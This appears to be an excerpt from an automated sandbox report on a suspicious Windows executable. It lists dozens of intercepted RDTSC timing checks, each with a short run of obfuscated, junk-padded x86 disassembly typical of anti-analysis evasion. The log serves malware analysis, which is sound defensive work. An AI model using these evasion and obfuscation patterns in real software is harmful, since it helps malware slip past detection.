Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF630E second address: EF6317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6317 second address: EF631B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF631B second address: EF6330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FC220745DF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6330 second address: EF6334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6334 second address: EF639E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c clc 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FC220745DF8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FC220745DF8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 je 00007FC220745DFCh 0x0000004b mov esi, dword ptr [ebp+122D29C6h] 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jnc 00007FC220745DF6h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF639E second address: EF63D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FC221A94B31h 0x00000010 jmp 00007FC221A94B2Bh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC221A94B38h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7C4F second address: EF7C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7C53 second address: EF7C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF865A second address: EF86AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC220745DFFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sub dword ptr [ebp+1244C01Ch], edx 0x00000016 xor dword ptr [ebp+1244C53Ah], edi 0x0000001c push 00000000h 0x0000001e mov edi, 550610D3h 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+124449ABh], edi 0x0000002b xchg eax, ebx 0x0000002c push ebx 0x0000002d jmp 00007FC220745E06h 0x00000032 pop ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF86AE second address: EF86B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF91C6 second address: EF91E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF91E3 second address: EF91E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F20 second address: EF8F45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FC220745DFCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBB33 second address: EFBB37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBB37 second address: EFBB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFBB45 second address: EFBB4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F00C83 second address: F00C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAC494 second address: EAC498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EAC498 second address: EAC4A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F04240 second address: F0428F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC221A94B32h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D1AAFh] 0x00000016 push 00000000h 0x00000018 mov bh, F0h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FC221A94B28h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 xchg eax, esi 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jl 00007FC221A94B26h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F050A7 second address: F050AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0613B second address: F0613F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F062DF second address: F062EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC220745DF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0809B second address: F080A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F080A0 second address: F080F4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC220745DFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d xor ebx, dword ptr [ebp+122D1B0Fh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FC220745DF8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f mov edi, dword ptr [ebp+122D2B3Eh] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push esi 0x0000003c pop esi 0x0000003d je 00007FC220745DF6h 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F07256 second address: F0725A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09135 second address: F09139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09139 second address: F0913F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0913F second address: F09149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F09149 second address: F091C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC221A94B28h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 clc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FC221A94B28h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 push 00000000h 0x00000045 jmp 00007FC221A94B39h 0x0000004a xchg eax, esi 0x0000004b push ebx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F091C5 second address: F091C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F091C9 second address: F091EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F091EF second address: F091F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F08349 second address: F0834D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0B2B3 second address: F0B310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jne 00007FC220745DFEh 0x0000000c nop 0x0000000d call 00007FC220745E01h 0x00000012 mov edi, dword ptr [ebp+122D2832h] 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c mov ebx, edi 0x0000001e pop ebx 0x0000001f push 00000000h 0x00000021 xor dword ptr [ebp+122D19CAh], eax 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push ebx 0x0000002a pushad 0x0000002b popad 0x0000002c pop ebx 0x0000002d pop eax 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jng 00007FC220745E08h 0x00000037 jmp 00007FC220745E02h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0C243 second address: F0C29D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FC221A94B28h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push edx 0x00000027 add bx, 951Dh 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f mov dword ptr [ebp+124449ABh], eax 0x00000035 push 00000000h 0x00000037 call 00007FC221A94B31h 0x0000003c push eax 0x0000003d xor bh, 00000054h 0x00000040 pop edi 0x00000041 pop ebx 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 pop ecx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0B4D3 second address: F0B4F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC220745DFFh 0x00000010 pop ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0E2E4 second address: F0E301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FC221A94B33h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0E301 second address: F0E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC220745DFAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0D5F8 second address: F0D60E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B31h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F59A second address: F0F5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0F5A0 second address: F0F646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D273Fh], eax 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FC221A94B28h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 mov bx, di 0x00000035 sub dword ptr [ebp+122D35A9h], ebx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 xor di, 3000h 0x00000047 mov eax, dword ptr [ebp+122D1519h] 0x0000004d mov dword ptr [ebp+122D1B79h], ebx 0x00000053 jnp 00007FC221A94B2Ch 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push ebx 0x0000005e call 00007FC221A94B28h 0x00000063 pop ebx 0x00000064 mov dword ptr [esp+04h], ebx 0x00000068 add dword ptr [esp+04h], 0000001Bh 0x00000070 inc ebx 0x00000071 push ebx 0x00000072 ret 0x00000073 pop ebx 0x00000074 ret 0x00000075 movsx ebx, dx 0x00000078 push eax 0x00000079 pushad 0x0000007a ja 00007FC221A94B2Ch 0x00000080 jo 00007FC221A94B2Ch 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14551 second address: F14555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F14555 second address: F14571 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC221A94B2Ch 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F19D37 second address: F19D3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F19D3F second address: F19D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F20893 second address: F208AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007FC220745DF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FC220745DF6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208AB second address: F208C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC221A94B2Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208C7 second address: F208CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208CB second address: F208EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FC221A94B32h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F208EE second address: F208F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24262 second address: F24269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24269 second address: F24285 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E06h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24285 second address: F24289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24787 second address: F2478B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2478B second address: F247A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC221A94B31h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F247A6 second address: F247CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC220745DFDh 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC220745DF6h 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A8B second address: F24A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A97 second address: F24A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24A9B second address: F24AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC221A94B2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24E9C second address: F24EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 jmp 00007FC220745E06h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push edi 0x00000010 ja 00007FC220745DF6h 0x00000016 jo 00007FC220745DF6h 0x0000001c pop edi 0x0000001d jl 00007FC220745DFAh 0x00000023 push eax 0x00000024 pop eax 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pushad 0x0000002c popad 0x0000002d pushad 0x0000002e popad 0x0000002f pop eax 0x00000030 pushad 0x00000031 push edx 0x00000032 pop edx 0x00000033 pushad 0x00000034 popad 0x00000035 jnp 00007FC220745DF6h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24EE9 second address: F24EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24EEF second address: F24EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F24EF5 second address: F24EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1046B second address: F10475 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E104 second address: F2E108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E427 second address: F2E43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FC220745DFCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E43E second address: F2E444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E444 second address: F2E448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E5B3 second address: F2E5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DB80 second address: F2DB8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DB8A second address: F2DB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DB95 second address: F2DB99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E8E3 second address: F2E8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC221A94B26h 0x0000000a jmp 00007FC221A94B2Eh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F334B4 second address: F334B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F334B8 second address: F334BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33639 second address: F33643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC220745DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33BDC second address: F33BE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33E44 second address: F33E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FC220745DF6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC220745E01h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33FAB second address: F33FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3422E second address: F34232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34232 second address: F34256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC221A94B39h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED94FE second address: ED9504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
